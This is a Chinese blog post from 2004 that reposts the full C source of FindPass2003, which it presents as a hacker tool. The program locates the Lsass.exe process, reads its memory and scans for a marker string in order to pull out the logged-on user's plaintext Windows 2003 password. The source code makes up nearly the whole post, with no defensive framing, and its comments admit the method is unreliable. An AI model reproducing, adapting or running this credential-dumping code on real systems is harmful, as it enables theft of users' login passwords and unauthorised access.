黑客工具FindPass2003源代码

于 2004-12-18 13:08:00 发布
阅读量1.1k 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: 编程技术 文章标签: 工具 buffer parameters search windows string
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/amh/article/details/220597
该博客展示了一个在Windows 2003系统上搜索登录用户密码的程序。程序通过获取Lsass.exe进程的PID,读取其内存,搜索特定字符串来定位密码。不过,这种方法不太可靠,且不一定能找到正确密码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

//********************************************************************************
// Version: V1.0
// Coder: WinEggDrop
// Date Release: 12/15/2004
// Purpose: To Demonstrate Searching Logon User Password On 2003 Box,The Method
//          Used Is Pretty Unwise,But This May Be The Only Way To Review The
//          Logon User's Password On Windows 2003.
// Test PlatForm: Windows 2003
// Compiled On: VC++ 6.0
//********************************************************************************
#include <stdio.h>
#include <windows.h>
#include <tlhelp32.h>

#define BaseAddress 0x002b5000        // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address,Which Causes The Result Unreliable

char  Password[MAX_PATH] = {0};        // Store The Found Password

// Function ProtoType Declaration
//------------------------------------------------------------------------------------------------------
BOOL  FindPassword(DWORD PID);
int   Search(char *Buffer,const UINT nSize);
DWORD GetLsassPID();
BOOL  Is2003();
//------------------------------------------------------------------------------------------------------
// End Of Fucntion ProtoType Declaration

int main()
{
 DWORD PID = 0;
 printf("Windows 2003 Password Viewer V1.0 By WinEggDrop/n/n");

 if (!Is2003())        // Check Out If The Box Is 2003
 {
     printf("The Program Can't Only Run On Windows 2003 Platform/n");
     return -1;
 }

 PID = GetLsassPID();        // Get The Lsass.exe PID

 if (PID == 0)        // Fail To Get PID If Returning Zerom
 {
     return -1;
 }

 FindPassword(PID);        // Find The Password From Lsass.exe Memory
 return 0;
}
// End main()

//------------------------------------------------------------------------------------
// Purpose: Search The Memory & Try To Get The Password
// Return Type: int
// Parameters:   
//           In: char *Buffer        --> The Memory Buffer To Search    
//          Out: const UINT nSize   --> The Size Of The Memory Buffer
// Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure",
//       Since The Password Is Near The Above Location,But It's Not Always True That
//       We Will Find The Magic String,Or Even We Find It,The Password May Be Located
//       At Some Other Place.We Only Look For Luck
//------------------------------------------------------------------------------------
int Search(char *Buffer,const UINT nSize)
{
 UINT OffSet = 0;
 UINT i = 0;
 UINT j = 0 ;
 UINT Count = 0;
 if (Buffer == NULL)
 {
     return -1;
 }
 for (i = 0 ; i < nSize ; i++)
 {
     /* The Below Is To Find The Magic String,Why So Complicated?That Will Thank MS.The Separation From Word To Word
        Is Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate
        The Magic String,We Have To Do It Manually And Slowly
     */
     if (Buffer[i] == 'L')
     {
         OffSet = 0;
         if (strnicmp(&Buffer[i + OffSet],"LocalSystem",strlen("LocalSystem")) == 0)
         {
             OffSet += strlen("LocalSystem") + 1;
             if (strnicmp(&Buffer[i + OffSet],"Remote",strlen("Remote")) == 0)
             {
                 OffSet += strlen("Remote") + 1;
                 if (strnicmp(&Buffer[i + OffSet],"Procedure",strlen("Procedure")) == 0)
                 {
                     OffSet += strlen("Procedure") + 1;
                     if (strnicmp(&Buffer[i + OffSet],"Call",strlen("Call")) == 0)
                     {
                         i += OffSet;
                         break;
                     }
                 }
             }
         }
     }
 }
 if (i < nSize)
 {
     ZeroMemory(Password,sizeof(Password));
     for (; i < nSize ; i++)
     {
         if (Buffer[i] == 0x02 && Buffer[i + 1] == 0 && Buffer[i + 2] == 0 && Buffer[i + 3] == 0 && Buffer[i + 4] == 0 && Buffer[i + 5] == 0 && Buffer[i + 6] == 0)
         {
             /* The Below Code Is To Retrieve The Password.Since The String Is In Unicode Format,So We Will Do It In
             That Way
             */
             j = i + 7;
             for (; j < nSize; j += 2)
             {
                 if (Buffer[j] >  0)
                 {
                     Password[Count++] = Buffer[j];
                 }
                 else
                 {
                     break;
                 }
             }
             return i + 7;        // One Flag To Indicate We Find The Password
         }
     }
 }
 return -1;        // Well,We Fail To Find The Password,And This Always Happens
}
// End Search

//------------------------------------------------------------------------------------
// Purpose: To Get The Lsass.exe PID
// Return Type: DWORD
// Parameters:  None
//------------------------------------------------------------------------------------
DWORD GetLsassPID()
{
 HANDLE hProcessSnap;
 HANDLE hProcess = NULL;
 PROCESSENTRY32 pe32;
 DWORD PID = 0;

 hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 if( hProcessSnap == INVALID_HANDLE_VALUE )
 {
     printf("Fail To Create Snap Shot/n");
     return 0;
 }

 pe32.dwSize = sizeof(PROCESSENTRY32);

 if( !Process32First(hProcessSnap, &pe32))
 {
     CloseHandle(hProcessSnap);     // Must clean up the snapshot object!
     return 0;
 }

 do
 {
  if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0)
  {
      PID = pe32.th32ProcessID;
      break;
  }
 }while(Process32Next( hProcessSnap, &pe32));

 CloseHandle( hProcessSnap);
 return PID;
}
// End GetLsassPID()

//------------------------------------------------------------------------------------
// Purpose: To Find The Password
// Return Type: BOOLEAN
// Parameters:  
//           In: DWORD PID        ->        The Lsass.exe's PID
//------------------------------------------------------------------------------------
BOOL FindPassword(DWORD PID)
{
 HANDLE hProcess = NULL;
 char   Buffer[5 * 1024] = {0};
 DWORD  ByteGet = 0;
 int    Found = -1;

 hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID);        // Open Process
 if (hProcess == NULL)
 {
     printf("Fail To Open Process/n");
     return FALSE;
 }

 if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 * 1024,&ByteGet))        // Read The Memory From Lsass.exe
 {
     printf("Fail To Read Memory/n");
     CloseHandle(hProcess);
     return FALSE;
 }

 CloseHandle(hProcess);
  
 Found = Search(Buffer,ByteGet);        // Search The Password
 if (Found >= 0)        // We May Find The Password
 {
     if (strlen(Password) > 0)        // Yes,We Find The Password Even We Don't Know If The Password Is Correct Or Not
     {
         printf("Found Password At #0x%x -> /"%s/"/n",Found + BaseAddress,Password);
     }
 }
 else
 {
     printf("Fail To Find The Password/n");
 }
 return TRUE;
}
// End FindPassword

//------------------------------------------------------------------------------------
// Purpose: Check If The Box Is Windows 2003
// Return Type: BOOLEAN
// Parameters:  None
//------------------------------------------------------------------------------------
BOOL Is2003()
{
 OSVERSIONINFOEX osvi;
 BOOL b0sVersionInfoEx;
 ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX));
 osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);

 if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi)))
 {
     osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
 }
 return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2);
}
// End Is2003()
// End Of File

amh
关注
专栏目录
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值